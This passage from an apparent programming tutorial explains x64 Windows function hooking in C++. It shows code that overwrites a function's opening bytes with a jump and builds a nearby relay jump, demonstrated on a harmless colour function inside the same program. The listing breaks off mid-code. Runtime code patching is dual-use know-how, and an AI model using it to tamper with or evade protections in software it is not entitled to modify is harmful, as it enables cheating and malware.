<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">Gdiplus</span><span class="o">::</span><span class="n">ARGB</span> <span class="nf">AddColors</span><span class="p">(</span><span class="n">Gdiplus</span><span class="o">::</span><span class="n">ARGB</span> <span class="n">left</span><span class="p">,</span> <span class="n">Gdiplus</span><span class="o">::</span><span class="n">ARGB</span> <span class="n">right</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">uint32_t</span> <span class="n">a</span> <span class="o">=</span> <span class="n">min</span><span class="p">(</span><span class="mh">0xFF000000</span><span class="p">,</span> <span class="p">(</span><span class="n">left</span> <span class="o">&</span> <span class="mh">0xFF000000</span><span class="p">)</span> <span class="o">+</span> <span class="p">(</span><span class="n">right</span> <span class="o">&</span> <span class="mh">0xFF000000</span><span class="p">));</span>
<span class="kt">uint32_t</span> <span class="n">r</span> <span class="o">=</span> <span class="n">min</span><span class="p">(</span><span class="mh">0x00FF0000</span><span class="p">,</span> <span class="p">(</span><span class="n">left</span> <span class="o">&</span> <span class="mh">0x00FF0000</span><span class="p">)</span> <span class="o">+</span> <span class="p">(</span><span class="n">right</span> <span class="o">&</span> <span class="mh">0x00FF0000</span><span class="p">));</span>
<span class="kt">uint32_t</span> <span class="n">g</span> <span class="o">=</span> <span class="n">min</span><span class="p">(</span><span class="mh">0x0000FF00</span><span class="p">,</span> <span class="p">(</span><span class="n">left</span> <span class="o">&</span> <span class="mh">0x0000FF00</span><span class="p">)</span> <span class="o">+</span> <span class="p">(</span><span class="n">right</span> <span class="o">&</span> <span class="mh">0x0000FF00</span><span class="p">));</span>
<span class="kt">uint32_t</span> <span class="n">b</span> <span class="o">=</span> <span class="n">min</span><span class="p">(</span><span class="mh">0x000000FF</span><span class="p">,</span> <span class="p">(</span><span class="n">left</span> <span class="o">&</span> <span class="mh">0x000000FF</span><span class="p">)</span> <span class="o">+</span> <span class="p">(</span><span class="n">right</span> <span class="o">&</span> <span class="mh">0x000000FF</span><span class="p">));</span>
<span class="k">return</span> <span class="n">a</span> <span class="o">|</span> <span class="n">r</span> <span class="o">|</span> <span class="n">g</span> <span class="o">|</span> <span class="n">b</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>The function that we want to replace it with (which I’ll call that “payload” function), looks like this:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">Gdiplus</span><span class="o">::</span><span class="n">ARGB</span> <span class="nf">ReturnRed</span><span class="p">(</span><span class="n">Gdiplus</span><span class="o">::</span><span class="n">ARGB</span> <span class="n">left</span><span class="p">,</span> <span class="n">Gdiplus</span><span class="o">::</span><span class="n">ARGB</span> <span class="n">right</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="mh">0xffff0000</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>If this was in your own code, you’d add a “return ReturnRed(left, right)” call to the beginning of AddColors(), recompile and call it a day, but what if you couldn’t recompile it? For example, what if it’s part of a closed source third party library, or the program that calls AddColors() is already running?</p>
<p>Rather than recompiling, we can use hooking to modify its instruction bytes instead, and replace the first instruction in AddColors() with a jmp to the beginning of the ReturnRed() function. This works even if the function we want to hook comes from a system dll, since DLL code segments are copy-on-write, so there’s no chance of a hook interfering with other processes.</p>
<p>Imagine that the first instruction in ReturnRed() is located 1024 bytes after AddColors() in memory. In assembly, replacing AddColors’ instructions with a jump will look like this:</p>
<div align="center">
<img src="/images/post_images/2020-11-13/basic_hook_thin.PNG" />
<br /><br />
</div>
<p>The jump instruction used here is a relative jump with a 32 bit operand. The opcode is E9, and that’s followed by a 4 byte value that represents how many bytes to jump.</p>
<p>Notice that after the jmp instruction, we’re left with garbage. This is because the process of overwriting the first 5 bytes of AddColors() left a partial instruction in its wake. The first byte of the second instruction was overwritten, but the rest of the bytes are still there, and who knows what instructions those map to. That leaves the rest of the function in an unknown (and likely invalid) state. This doesn’t matter for the example, because the program is going to jump to ReturnRed() before it ever gets to the garbage we just created, but it’s important to keep in mind.</p>
<p>We’ll write some hooks that preserve the hooked function’s original logic later in this post, so don’t worry about that too much right now. For our first example, we’ll build a program that destructively hooks a function, exactly like what’s shown in the diagram above (with some extra sauce to handle 64 bit code).</p>
<h2 id="example-1-our-first-function-hook">Example 1: Our First Function Hook</h2>
<p>Let’s roll with the example code already provided and write a program that actually redirects program flow from AddColors() to ReturnRed(). The game plan here is to end up with a main() function that looks like this:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="c1">//both functions inside the same program as main()</span>
<span class="n">Gdiplus</span><span class="o">::</span><span class="n">ARGB</span> <span class="nf">AddColors</span><span class="p">(</span><span class="n">Gdiplus</span><span class="o">::</span><span class="n">ARGB</span> <span class="n">left</span><span class="p">,</span> <span class="n">Gdiplus</span><span class="o">::</span><span class="n">ARGB</span> <span class="n">right</span><span class="p">);</span>
<span class="n">Gdiplus</span><span class="o">::</span><span class="n">ARGB</span> <span class="nf">ReturnRed</span><span class="p">(</span><span class="n">Gdiplus</span><span class="o">::</span><span class="n">ARGB</span> <span class="n">left</span><span class="p">,</span> <span class="n">Gdiplus</span><span class="o">::</span><span class="n">ARGB</span> <span class="n">right</span><span class="p">);</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">()</span>
<span class="p">{</span>
<span class="c1">//install a hook in AddColors, going to ReturnRed</span>
<span class="n">InstallHook</span><span class="p">(</span><span class="n">AddColors</span><span class="p">,</span> <span class="n">ReturnRed</span><span class="p">);</span>
<span class="n">Gdiplus</span><span class="o">::</span><span class="n">ARGB</span> <span class="n">col</span> <span class="o">=</span> <span class="n">AddColors</span><span class="p">(</span><span class="mh">0x00000000</span><span class="p">,</span> <span class="mh">0x000000FF</span><span class="p">);</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"%x</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">col</span><span class="p">);</span> <span class="c1">//will always be 0xFFFF0000</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>In a 32 bit program, the logic for InstallHook() can be implemented pretty much exactly how the diagram above suggests it would be:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="kt">void</span> <span class="nf">InstallHook</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">func2hook</span><span class="p">,</span> <span class="kt">void</span><span class="o">*</span> <span class="n">payloadFunction</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">DWORD</span> <span class="n">oldProtect</span><span class="p">;</span>
<span class="n">VirtualProtect</span><span class="p">(</span><span class="n">AddColors</span><span class="p">,</span> <span class="mi">1024</span><span class="p">,</span> <span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">,</span> <span class="o">&</span><span class="n">oldProtect</span><span class="p">);</span>
<span class="c1">//32 bit relative jump opcode is E9, takes 1 32 bit operand for jump offset</span>
<span class="kt">uint8_t</span> <span class="n">jmpInstruction</span><span class="p">[</span><span class="mi">5</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mh">0xE9</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span> <span class="p">};</span>
<span class="c1">//to fill out the last 4 bytes of jmpInstruction, we need the offset between </span>
<span class="c1">//the payload function and the instruction immediately AFTER the jmp instruction</span>
<span class="k">const</span> <span class="kt">uint32_t</span> <span class="n">relAddr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint32_t</span><span class="p">)</span><span class="n">payloadFunction</span> <span class="o">-</span> <span class="p">((</span><span class="kt">uint32_t</span><span class="p">)</span><span class="n">func2hook</span> <span class="o">+</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpInstruction</span><span class="p">));</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">jmpInstruction</span> <span class="o">+</span> <span class="mi">1</span><span class="p">,</span> <span class="o">&</span><span class="n">relAddr</span><span class="p">,</span> <span class="mi">4</span><span class="p">);</span>
<span class="c1">//install the hook</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">func2hook</span><span class="p">,</span> <span class="n">jmpInstruction</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpInstruction</span><span class="p">));</span>
<span class="p">}</span></code></pre></figure>
<p>Things are a bit trickier in 64 bit, because functions can be located so far away from each other in memory that a 32 bit jmp instruction can’t jump that far, meaning that the 5 byte jump written by InstallHook() might be unable to reach the payload function from the hooked function.</p>
<p>There’s no such thing as a 64 bit relative jmp instruction, so the next best option is to jmp to an address stored in a register, like the assembly shown below. Note that this snippet uses the r10 register because it’s one of the few volatile registers that isn’t used for passing function arguments in the Windows x64 calling convention (<a href="https://docs.microsoft.com/en-us/cpp/build/x64-calling-convention?view=vs-2019">msdn link</a>)</p>
<figure class="highlight"><pre><code class="language-asm" data-lang="asm">49 BA 00 00 00 00 00 00 04 00 mov r10,400h
41 FF E2 jmp r10 </code></pre></figure>
<p>If we throw this in the beginning of hooked functions instead of the 5 byte jump from before, we’d limit the number of functions that we could hook to those with 13 or more bytes. That’s a singificantly bigger limitation than our 32 bit code, so we’re instead going to write the bytes for this absolute jump somewhere in memory that’s close to the function we’re hooking. Then we’ll have the 5 byte jump we install in that function jump to this absolute jump, instead of straight to the payload function. <a href="https://github.com/TsudaKageyu/minhook">Minhook</a> refers to this absolute jump as the “relay function,” and I’m going to use that terminology as well.</p>
<div align="center">
<img src="/images/post_images/2020-11-13/64bit_basic_hook.PNG" />
<br /><br />
</div>
<p>Writing code to do this little dance is similar to the InstallHook() function shown above, but with a few more steps. The trickiest part of the process is allocating memory for the relay function that’s close enough to the target function to be reachable by a 5 byte jump. I’ve implemented logic for this in a function called AllocatePageNearAddress(). This function is a bit long, so I’ve included it’s implementation in the (expandable) box below, and omitted it from the sample code snippet immediately after that.</p>
<div class="collapsewrapper2">
<details class="collapsible">
<summary>AllocPageNearAddress() implementation (click to expand)</summary>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="kt">void</span><span class="o">*</span> <span class="nf">AllocatePageNearAddress</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">targetAddr</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">SYSTEM_INFO</span> <span class="n">sysInfo</span><span class="p">;</span>
<span class="n">GetSystemInfo</span><span class="p">(</span><span class="o">&</span><span class="n">sysInfo</span><span class="p">);</span>
<span class="k">const</span> <span class="kt">uint64_t</span> <span class="n">PAGE_SIZE</span> <span class="o">=</span> <span class="n">sysInfo</span><span class="p">.</span><span class="n">dwPageSize</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">startAddr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">(</span><span class="n">targetAddr</span><span class="p">)</span> <span class="o">&</span> <span class="o">~</span><span class="p">(</span><span class="n">PAGE_SIZE</span> <span class="o">-</span> <span class="mi">1</span><span class="p">));</span> <span class="c1">//round down to nearest page boundary</span>
<span class="kt">uint64_t</span> <span class="n">minAddr</span> <span class="o">=</span> <span class="n">min</span><span class="p">(</span><span class="n">startAddr</span> <span class="o">-</span> <span class="mh">0x7FFFFF00</span><span class="p">,</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">sysInfo</span><span class="p">.</span><span class="n">lpMinimumApplicationAddress</span><span class="p">);</span>
<span class="kt">uint64_t</span> <span class="n">maxAddr</span> <span class="o">=</span> <span class="n">max</span><span class="p">(</span><span class="n">startAddr</span> <span class="o">+</span> <span class="mh">0x7FFFFF00</span><span class="p">,</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">sysInfo</span><span class="p">.</span><span class="n">lpMaximumApplicationAddress</span><span class="p">);</span>
<span class="kt">uint64_t</span> <span class="n">startPage</span> <span class="o">=</span> <span class="p">(</span><span class="n">startAddr</span> <span class="o">-</span> <span class="p">(</span><span class="n">startAddr</span> <span class="o">%</span> <span class="n">PAGE_SIZE</span><span class="p">));</span>
<span class="kt">uint64_t</span> <span class="n">pageOffset</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>
<span class="k">while</span> <span class="p">(</span><span class="mi">1</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">uint64_t</span> <span class="n">byteOffset</span> <span class="o">=</span> <span class="n">pageOffset</span> <span class="o">*</span> <span class="n">PAGE_SIZE</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">highAddr</span> <span class="o">=</span> <span class="n">startPage</span> <span class="o">+</span> <span class="n">byteOffset</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">lowAddr</span> <span class="o">=</span> <span class="p">(</span><span class="n">startPage</span> <span class="o">></span> <span class="n">byteOffset</span><span class="p">)</span> <span class="o">?</span> <span class="n">startPage</span> <span class="o">-</span> <span class="n">byteOffset</span> <span class="o">:</span> <span class="mi">0</span><span class="p">;</span>
<span class="kt">bool</span> <span class="n">needsExit</span> <span class="o">=</span> <span class="n">highAddr</span> <span class="o">></span> <span class="n">maxAddr</span> <span class="o">&&</span> <span class="n">lowAddr</span> <span class="o"><</span> <span class="n">minAddr</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">highAddr</span> <span class="o"><</span> <span class="n">maxAddr</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">void</span><span class="o">*</span> <span class="n">outAddr</span> <span class="o">=</span> <span class="n">VirtualAlloc</span><span class="p">((</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="n">highAddr</span><span class="p">,</span> <span class="n">PAGE_SIZE</span><span class="p">,</span> <span class="n">MEM_COMMIT</span> <span class="o">|</span> <span class="n">MEM_RESERVE</span><span class="p">,</span> <span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">outAddr</span><span class="p">)</span>
<span class="k">return</span> <span class="n">outAddr</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">lowAddr</span> <span class="o">></span> <span class="n">minAddr</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">void</span><span class="o">*</span> <span class="n">outAddr</span> <span class="o">=</span> <span class="n">VirtualAlloc</span><span class="p">((</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="n">lowAddr</span><span class="p">,</span> <span class="n">PAGE_SIZE</span><span class="p">,</span> <span class="n">MEM_COMMIT</span> <span class="o">|</span> <span class="n">MEM_RESERVE</span><span class="p">,</span> <span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">outAddr</span> <span class="o">!=</span> <span class="nb">nullptr</span><span class="p">)</span>
<span class="k">return</span> <span class="n">outAddr</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">pageOffset</span><span class="o">++</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">needsExit</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nb">nullptr</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
</details></div>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="kt">void</span> <span class="nf">WriteAbsoluteJump64</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">absJumpMemory</span><span class="p">,</span> <span class="kt">void</span><span class="o">*</span> <span class="n">addrToJumpTo</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">uint8_t</span> <span class="n">absJumpInstructions</span><span class="p">[]</span> <span class="o">=</span>
<span class="p">{</span>
<span class="mh">0x49</span><span class="p">,</span> <span class="mh">0xBA</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="c1">//mov r10, addr</span>
<span class="mh">0x41</span><span class="p">,</span> <span class="mh">0xFF</span><span class="p">,</span> <span class="mh">0xE2</span> <span class="c1">//jmp r10</span>
<span class="p">};</span>
<span class="kt">uint64_t</span> <span class="n">addrToJumpTo64</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">addrToJumpTo</span><span class="p">;</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">absJumpInstructions</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="o">&</span><span class="n">addrToJumpTo64</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">addrToJumpTo64</span><span class="p">));</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">absJumpMemory</span><span class="p">,</span> <span class="n">absJumpInstructions</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">absJumpInstructions</span><span class="p">));</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">InstallHook</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">func2hook</span><span class="p">,</span> <span class="kt">void</span><span class="o">*</span> <span class="n">payloadFunction</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">void</span><span class="o">*</span> <span class="n">relayFuncMemory</span> <span class="o">=</span> <span class="n">AllocatePageNearAddress</span><span class="p">(</span><span class="n">func2hook</span><span class="p">);</span>
<span class="n">WriteAbsoluteJump64</span><span class="p">(</span><span class="n">relayFuncMemory</span><span class="p">,</span> <span class="n">payloadFunction</span><span class="p">);</span> <span class="c1">//write relay func instructions</span>
<span class="c1">//now that the relay function is built, we need to install the E9 jump into the target func,</span>
<span class="c1">//this will jump to the relay function</span>
<span class="n">DWORD</span> <span class="n">oldProtect</span><span class="p">;</span>
<span class="n">VirtualProtect</span><span class="p">(</span><span class="n">func2hook</span><span class="p">,</span> <span class="mi">1024</span><span class="p">,</span> <span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">,</span> <span class="o">&</span><span class="n">oldProtect</span><span class="p">);</span>
<span class="c1">//32 bit relative jump opcode is E9, takes 1 32 bit operand for jump offset</span>
<span class="kt">uint8_t</span> <span class="n">jmpInstruction</span><span class="p">[</span><span class="mi">5</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mh">0xE9</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span> <span class="p">};</span>
<span class="c1">//to fill out the last 4 bytes of jmpInstruction, we need the offset between </span>
<span class="c1">//the relay function and the instruction immediately AFTER the jmp instruction</span>
<span class="k">const</span> <span class="kt">uint64_t</span> <span class="n">relAddr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">relayFuncMemory</span> <span class="o">-</span> <span class="p">((</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">func2hook</span> <span class="o">+</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpInstruction</span><span class="p">));</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">jmpInstruction</span> <span class="o">+</span> <span class="mi">1</span><span class="p">,</span> <span class="o">&</span><span class="n">relAddr</span><span class="p">,</span> <span class="mi">4</span><span class="p">);</span>
<span class="c1">//install the hook</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">func2hook</span><span class="p">,</span> <span class="n">jmpInstruction</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpInstruction</span><span class="p">));</span>
<span class="p">}</span></code></pre></figure>
<p>With a bit of copy and paste magic, all the code snippets until now can be combined into our first example program. The end result is a small program that ends up calling ReturnRed() whenever we try to call AddColors(). The full code for this example is included in the expandable box below. Note that since this example creates x64 specific instructions for the relay function, it won’t work if it’s built as a 32 bit application. This will be the same for every example we build in this post.</p>
<div class="collapsewrapper2">
<details class="collapsible">
<summary>Full Code For Example 1 (click to expand)</summary>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="cp">#include <Windows.h>
#include <stdint.h>
#include <stdio.h>
#include <memoryapi.h>
</span>
<span class="cp">#include <gdiplus.h>
#pragma comment (lib, "Gdiplus.lib")
</span><span class="n">Gdiplus</span><span class="o">::</span><span class="n">ARGB</span> <span class="nf">AddColors</span><span class="p">(</span><span class="n">Gdiplus</span><span class="o">::</span><span class="n">ARGB</span> <span class="n">left</span><span class="p">,</span> <span class="n">Gdiplus</span><span class="o">::</span><span class="n">ARGB</span> <span class="n">right</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">uint32_t</span> <span class="n">a</span> <span class="o">=</span> <span class="n">min</span><span class="p">(</span><span class="mh">0xFF000000</span><span class="p">,</span> <span class="p">(</span><span class="n">left</span> <span class="o">&</span> <span class="mh">0xFF000000</span><span class="p">)</span> <span class="o">+</span> <span class="p">(</span><span class="n">right</span> <span class="o">&</span> <span class="mh">0xFF000000</span><span class="p">));</span>
<span class="kt">uint32_t</span> <span class="n">r</span> <span class="o">=</span> <span class="n">min</span><span class="p">(</span><span class="mh">0x00FF0000</span><span class="p">,</span> <span class="p">(</span><span class="n">left</span> <span class="o">&</span> <span class="mh">0x00FF0000</span><span class="p">)</span> <span class="o">+</span> <span class="p">(</span><span class="n">right</span> <span class="o">&</span> <span class="mh">0x00FF0000</span><span class="p">));</span>
<span class="kt">uint32_t</span> <span class="n">g</span> <span class="o">=</span> <span class="n">min</span><span class="p">(</span><span class="mh">0x0000FF00</span><span class="p">,</span> <span class="p">(</span><span class="n">left</span> <span class="o">&</span> <span class="mh">0x0000FF00</span><span class="p">)</span> <span class="o">+</span> <span class="p">(</span><span class="n">right</span> <span class="o">&</span> <span class="mh">0x0000FF00</span><span class="p">));</span>
<span class="kt">uint32_t</span> <span class="n">b</span> <span class="o">=</span> <span class="n">min</span><span class="p">(</span><span class="mh">0x000000FF</span><span class="p">,</span> <span class="p">(</span><span class="n">left</span> <span class="o">&</span> <span class="mh">0x000000FF</span><span class="p">)</span> <span class="o">+</span> <span class="p">(</span><span class="n">right</span> <span class="o">&</span> <span class="mh">0x000000FF</span><span class="p">));</span>
<span class="k">return</span> <span class="n">a</span> <span class="o">|</span> <span class="n">r</span> <span class="o">|</span> <span class="n">g</span> <span class="o">|</span> <span class="n">b</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">Gdiplus</span><span class="o">::</span><span class="n">ARGB</span> <span class="nf">ReturnRed</span><span class="p">(</span><span class="n">Gdiplus</span><span class="o">::</span><span class="n">ARGB</span> <span class="n">left</span><span class="p">,</span> <span class="n">Gdiplus</span><span class="o">::</span><span class="n">ARGB</span> <span class="n">right</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="mh">0xffff0000</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">void</span><span class="o">*</span> <span class="nf">AllocatePageNearAddress</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">targetAddr</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">SYSTEM_INFO</span> <span class="n">sysInfo</span><span class="p">;</span>
<span class="n">GetSystemInfo</span><span class="p">(</span><span class="o">&</span><span class="n">sysInfo</span><span class="p">);</span>
<span class="k">const</span> <span class="kt">uint64_t</span> <span class="n">PAGE_SIZE</span> <span class="o">=</span> <span class="n">sysInfo</span><span class="p">.</span><span class="n">dwPageSize</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">startAddr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">(</span><span class="n">targetAddr</span><span class="p">)</span> <span class="o">&</span> <span class="o">~</span><span class="p">(</span><span class="n">PAGE_SIZE</span> <span class="o">-</span> <span class="mi">1</span><span class="p">));</span> <span class="c1">//round down to nearest page boundary</span>
<span class="kt">uint64_t</span> <span class="n">minAddr</span> <span class="o">=</span> <span class="n">min</span><span class="p">(</span><span class="n">startAddr</span> <span class="o">-</span> <span class="mh">0x7FFFFF00</span><span class="p">,</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">sysInfo</span><span class="p">.</span><span class="n">lpMinimumApplicationAddress</span><span class="p">);</span>
<span class="kt">uint64_t</span> <span class="n">maxAddr</span> <span class="o">=</span> <span class="n">max</span><span class="p">(</span><span class="n">startAddr</span> <span class="o">+</span> <span class="mh">0x7FFFFF00</span><span class="p">,</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">sysInfo</span><span class="p">.</span><span class="n">lpMaximumApplicationAddress</span><span class="p">);</span>
<span class="kt">uint64_t</span> <span class="n">startPage</span> <span class="o">=</span> <span class="p">(</span><span class="n">startAddr</span> <span class="o">-</span> <span class="p">(</span><span class="n">startAddr</span> <span class="o">%</span> <span class="n">PAGE_SIZE</span><span class="p">));</span>
<span class="kt">uint64_t</span> <span class="n">pageOffset</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>
<span class="k">while</span> <span class="p">(</span><span class="mi">1</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">uint64_t</span> <span class="n">byteOffset</span> <span class="o">=</span> <span class="n">pageOffset</span> <span class="o">*</span> <span class="n">PAGE_SIZE</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">highAddr</span> <span class="o">=</span> <span class="n">startPage</span> <span class="o">+</span> <span class="n">byteOffset</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">lowAddr</span> <span class="o">=</span> <span class="p">(</span><span class="n">startPage</span> <span class="o">></span> <span class="n">byteOffset</span><span class="p">)</span> <span class="o">?</span> <span class="n">startPage</span> <span class="o">-</span> <span class="n">byteOffset</span> <span class="o">:</span> <span class="mi">0</span><span class="p">;</span>
<span class="kt">bool</span> <span class="n">needsExit</span> <span class="o">=</span> <span class="n">highAddr</span> <span class="o">></span> <span class="n">maxAddr</span> <span class="o">&&</span> <span class="n">lowAddr</span> <span class="o"><</span> <span class="n">minAddr</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">highAddr</span> <span class="o"><</span> <span class="n">maxAddr</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">void</span><span class="o">*</span> <span class="n">outAddr</span> <span class="o">=</span> <span class="n">VirtualAlloc</span><span class="p">((</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="n">highAddr</span><span class="p">,</span> <span class="n">PAGE_SIZE</span><span class="p">,</span> <span class="n">MEM_COMMIT</span> <span class="o">|</span> <span class="n">MEM_RESERVE</span><span class="p">,</span> <span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">outAddr</span><span class="p">)</span>
<span class="k">return</span> <span class="n">outAddr</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">lowAddr</span> <span class="o">></span> <span class="n">minAddr</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">void</span><span class="o">*</span> <span class="n">outAddr</span> <span class="o">=</span> <span class="n">VirtualAlloc</span><span class="p">((</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="n">lowAddr</span><span class="p">,</span> <span class="n">PAGE_SIZE</span><span class="p">,</span> <span class="n">MEM_COMMIT</span> <span class="o">|</span> <span class="n">MEM_RESERVE</span><span class="p">,</span> <span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">outAddr</span> <span class="o">!=</span> <span class="nb">nullptr</span><span class="p">)</span>
<span class="k">return</span> <span class="n">outAddr</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">pageOffset</span><span class="o">++</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">needsExit</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nb">nullptr</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">WriteAbsoluteJump64</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">absJumpMemory</span><span class="p">,</span> <span class="kt">void</span><span class="o">*</span> <span class="n">addrToJumpTo</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">uint8_t</span> <span class="n">absJumpInstructions</span><span class="p">[]</span> <span class="o">=</span>
<span class="p">{</span>
<span class="mh">0x49</span><span class="p">,</span> <span class="mh">0xBA</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="c1">//mov r10, addr</span>
<span class="mh">0x41</span><span class="p">,</span> <span class="mh">0xFF</span><span class="p">,</span> <span class="mh">0xE2</span> <span class="c1">//jmp r10</span>
<span class="p">};</span>
<span class="kt">uint64_t</span> <span class="n">addrToJumpTo64</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">addrToJumpTo</span><span class="p">;</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">absJumpInstructions</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="o">&</span><span class="n">addrToJumpTo64</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">addrToJumpTo64</span><span class="p">));</span>
